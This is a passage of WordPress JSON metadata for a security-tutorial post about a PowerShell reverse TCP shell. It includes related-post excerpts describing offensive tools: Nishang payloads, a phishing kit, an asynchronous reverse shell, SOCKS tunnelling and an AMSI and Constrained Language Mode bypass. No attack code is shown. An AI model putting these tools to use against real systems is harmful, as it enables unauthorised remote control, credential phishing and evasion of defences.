Host","datePublished":"2020-05-07T12:04:09+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/powershell\/"},"wordCount":573,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/powershell\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png","keywords":["PowerShell","Powershell-Reverse-TCP","Remote Host","Reverse-TCP"],"articleSection":["Kali Linux"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/powershell\/","url":"https:\/\/kalilinuxtutorials.com\/powershell\/","name":"PowerShell Script For Connecting To A Remote Host","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/powershell\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/powershell\/#primaryimage"},"thumbnailUrl":"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png","datePublished":"2020-05-07T12:04:09+00:00","description":"PowerShell script for connecting to a remote host. Remote host will have full control over client's PowerShell and all its underlying commands.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/powershell\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/powershell\/#primaryimage","url":"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png","contentUrl":"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/1.bp.blogspot.com\/--7SQL1MoYck\/XrP4y8irSjI\/AAAAAAAAGLY\/QRu43rlPQCwbwQgxAL_FjwsyQWzqqzoYQCLcBGAsYHQ\/s1600\/Images-1.png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":10662,"url":"https:\/\/kalilinuxtutorials.com\/nishang\/","url_meta":{"origin":10500,"position":0},"title":"Nishang : Offensive PowerShell For Red Team, Penetration Testing &#038; Offensive Security","author":"R K","date":"May 29, 2020","format":false,"excerpt":"Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. Usage Import all the scripts in the current PowerShell session (PowerShell v3 onwards). PS C:\\nishang> Import-Module .\\nishang.psm1 Use\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":10542,"url":"https:\/\/kalilinuxtutorials.com\/nexphisher\/","url_meta":{"origin":10500,"position":1},"title":"Nexphisher : Advanced Phishing Tool For Linux &#038; Termux","author":"R K","date":"May 11, 2020","format":false,"excerpt":"NexPhisher is an automated Phishing tool made for Termux & Linux .The phishing Pages are Taken from Zphisher under GNU General Public License v3.0 . This tool has 37 Phishing Page Templates of 30 Websites.There are 5 Port Forwarding Options including Localhost !! Installation apt updateapt install git -ygit clone\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":27344,"url":"https:\/\/kalilinuxtutorials.com\/psasyncshell\/","url_meta":{"origin":10500,"position":2},"title":"PSAsyncShell : PowerShell Asynchronous TCP Reverse Shell","author":"R K","date":"September 29, 2022","format":false,"excerpt":"PSAsyncShell\u00a0is an Asynchronous TCP Reverse Shell written in pure PowerShell. Unlike other reverse shells, all the communication and execution flow is done asynchronously, allowing to bypass some firewalls and some countermeasures against this kind of remote connections. Additionally, this tool features command history, screen wiping, file uploading and downloading, information\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjtKsO5g7QOX_lYRN1PLK_Wqe0fnEbnBMRPr4Ut9R35grK44I9JHIwevMkJOt9EGhMDoihGswnupeNhQwlwpnxCSazoM8MqAzT3nKLSLz5Z1tQtBj9p1qiJB_fDjHw5RmK83bBqz8ed2HzgYqg4D4I7JkfvT_S7GkTb85muzObviscm3eIlEjuLAzWS\/s608\/PSAsyncShell%20%281%29.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjtKsO5g7QOX_lYRN1PLK_Wqe0fnEbnBMRPr4Ut9R35grK44I9JHIwevMkJOt9EGhMDoihGswnupeNhQwlwpnxCSazoM8MqAzT3nKLSLz5Z1tQtBj9p1qiJB_fDjHw5RmK83bBqz8ed2HzgYqg4D4I7JkfvT_S7GkTb85muzObviscm3eIlEjuLAzWS\/s608\/PSAsyncShell%20%281%29.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjtKsO5g7QOX_lYRN1PLK_Wqe0fnEbnBMRPr4Ut9R35grK44I9JHIwevMkJOt9EGhMDoihGswnupeNhQwlwpnxCSazoM8MqAzT3nKLSLz5Z1tQtBj9p1qiJB_fDjHw5RmK83bBqz8ed2HzgYqg4D4I7JkfvT_S7GkTb85muzObviscm3eIlEjuLAzWS\/s608\/PSAsyncShell%20%281%29.png?resize=525%2C300&ssl=1 1.5x"},"classes":[]},{"id":13736,"url":"https:\/\/kalilinuxtutorials.com\/redpill\/","url_meta":{"origin":10500,"position":3},"title":"Redpill : Assist Reverse Tcp Shells In Post-Exploration Tasks","author":"R K","date":"June 27, 2021","format":false,"excerpt":"Redpill project aims to assist reverse tcp shells in post-exploration tasks. Often in redteam engagements weneed to use unconventional ways to access target system, such as reverse tcp shells (not metasploit) in orderto bypass the defenses implemented by the system administrator. After the first stage was successful compleatedwe face another\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":12364,"url":"https:\/\/kalilinuxtutorials.com\/invoke-socksproxy\/","url_meta":{"origin":10500,"position":4},"title":"Invoke SocksProxy : Socks Proxy &#038; Reverse Socks Server Using Powershell","author":"R K","date":"March 24, 2021","format":false,"excerpt":"Invoke SocksProxy is a tool that creates a local or \"reverse\" Socks proxy using powershell. The local proxy is a simple Socks 4\/5 proxy. The reverse proxy creates a tcp tunnel by initiating outbond SSL connections that can go through the system's proxy. The tunnel can then be used as\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":36881,"url":"https:\/\/kalilinuxtutorials.com\/fullbypass\/","url_meta":{"origin":10500,"position":5},"title":"FullBypass : A Tool For AMSI And PowerShell CLM Bypass","author":"Varshini","date":"March 6, 2025","format":false,"excerpt":"FullBypass is a tool designed to circumvent Microsoft's Antimalware Scan Interface (AMSI) and PowerShell's Constrained Language Mode (CLM). By doing so, it enables the execution of unrestricted PowerShell commands, providing a FullLanguage reverse shell. While such tools can be used for legitimate penetration testing and security research, their unethical use\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/FullBypass-.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/FullBypass-.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/FullBypass-.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/FullBypass-.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/FullBypass-.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/03\/FullBypass-.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/10500","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=10500"}],"version-history":[{"count":0,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/10500\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/16284"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=10500"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=10500"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=10500"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}